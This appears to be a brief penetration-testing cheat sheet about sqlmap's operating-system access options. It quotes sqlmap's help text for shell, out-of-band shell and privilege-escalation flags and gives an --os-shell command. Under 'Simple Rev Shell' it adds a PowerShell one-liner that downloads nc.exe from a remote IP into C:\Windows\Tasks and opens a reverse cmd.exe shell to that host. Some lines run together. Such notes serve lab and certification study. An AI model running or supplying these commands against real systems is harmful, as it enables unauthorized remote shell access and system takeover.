SQLMap
sqlmap -r inject.txt --os-shell Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
--msf-path=MSFPATH Local path where Metasploit Framework is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directorySimple Rev Shell
powershell.exe wget http://192.168.45.162/nc.exe -OutFile c:\\Windows\\Tasks\\nc.exec:\\Windows\\Tasks\\nc.exe -e cmd.exe 192.168.45.162 443Proxy through Burp + other syntax
Last updated